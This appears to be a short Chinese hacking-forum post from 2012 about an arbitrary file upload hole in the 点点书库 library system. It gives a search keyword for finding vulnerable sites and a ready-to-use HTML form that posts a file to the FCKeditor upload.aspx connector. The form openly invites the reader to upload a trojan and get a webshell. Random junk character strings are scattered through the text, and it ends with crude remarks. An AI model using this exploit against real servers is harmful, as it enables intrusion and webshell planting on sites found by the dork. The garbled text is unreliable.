主题:图书馆系统任意文件上传漏洞: h& Z1 l( N" p% F4 Z
作者:冰锋刺客
- g4 c+ r7 h$ ]* n$ K" r* ~* `+ d 厂商:点击书(dianjishu.com)/ x( z) |9 F: o7 ?; X; b
日期:2012-6-21& E) v3 l; E& Y" Y) @
& r- _0 b( A5 P- g) i+ l* V3 _0 O4 O
I 概述& v, J5 u. q8 \ d2 _3 G4 |
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell% g4 s* a& r5 Z
II 简介1 Y; }) i* e/ n1 H' z8 _2 s
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
6 |- f4 j. L% P) ]% x 补充一个漏洞8 \, v: h- z+ g% s2 I
<form id="frmUpload" enctype="multipart/form-data"" f/ Y' X T6 {* R& n
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>, \0 l) E" M1 N( b, k( R9 y
<input id="btnUpload" type="submit" value="操翻他">' |+ i: l3 S2 [* G) E& j& c
</form>2 `6 a5 m$ O& K% `2 g$ L& D \
你们懂的
" @* L r6 }3 ^ 那傻逼提供还需要改包.
, r: b" G: _5 Z 自己看了下源代码发现fckeditor
8 U/ w3 B3 E# w( N q+ L) R0 ~ 直接秒杀
/ Z, y% E) u( J' j' Q |